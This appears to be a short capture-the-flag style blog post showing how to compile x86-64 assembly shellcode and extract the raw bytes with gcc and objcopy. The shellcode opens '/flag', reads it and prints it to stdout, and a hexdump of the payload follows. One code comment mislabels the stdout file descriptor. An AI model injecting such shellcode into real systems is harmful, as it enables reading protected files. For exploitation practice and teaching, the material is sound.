cool head picture

UNLE⛧SH THE BEAST ト何ゼ

Best way to get your raw shellcode

Dec. 10, 2020 // echel0n

Hello fellas! If you're wondering how to compile your payload and get raw shellcode in seconds, you can try this.

  1. .global _start

  2. _start:

  3. .intel_syntax noprefix

  4. 	push [rip + 0x28]

  5. 	push rsp

  6. 	pop rdi

  7. 

  8. 	push 0

  9. 	pop rsi # SET O_RDONLY FILE OPEN MODE

  10. 	push 2

  11. 	pop rax # syscall open()

  12. 	syscall

  13. 

  14. 	# read(int fd, void *buf, size_t count)

  15. 	push rax # rax has fd num

  16. 	pop rdi # rax onto rdi

  17. 	push rsp

  18. 	pop rsi

  19. 	push 150

  20. 	pop rdx # set bufferlen=150

  21. 	push 0

  22. 	pop rax # set rax = 0 syscall for read()

  23. 	syscall

  24. 

  25. 	# write(int fd, void *buf, size_t count)

  26. 	push rsp

  27. 	pop rsi

  28. 	push 1 # syscal write()

  29. 	pop rax # set write() syscall

  30. 	push 1

  31. 	pop rdi # fd 0 TO STDOUT

  32. 	syscall

  33. 	

  34. 	# exit()

  35. 	push 60

  36. 	pop rax # syscall for exit()

  37. 	syscall

  38. flagstring:

  39. 	.string "\x2f\x66\x6c\x61\x67\x00"

  1. $ gcc -nostdlib -static shellcode.asm -o shellcode-elf

  2. $ objcopy --dump-section .text=shellcode-raw shellcode-elf

Congrats! You've just compiled your shellcode and copied raw payload to ./shellcode-raw file. Let's verify this. 

  1. 00000000: ff34 252f 1040 0054 5f6a 005e 6a02 580f  .4%/.@.T_j.^j.X.

  2. 00000010: 0550 5f54 5e68 9600 0000 5a6a 0058 0f05  .P_T^h....Zj.X..

  3. 00000020: 545e 6a01 586a 015f 0f05 6a3c 580f 052f  T^j.Xj._..j<X../

  4. 00000030: 666c 6167 0000                           flag..

Have a nice day!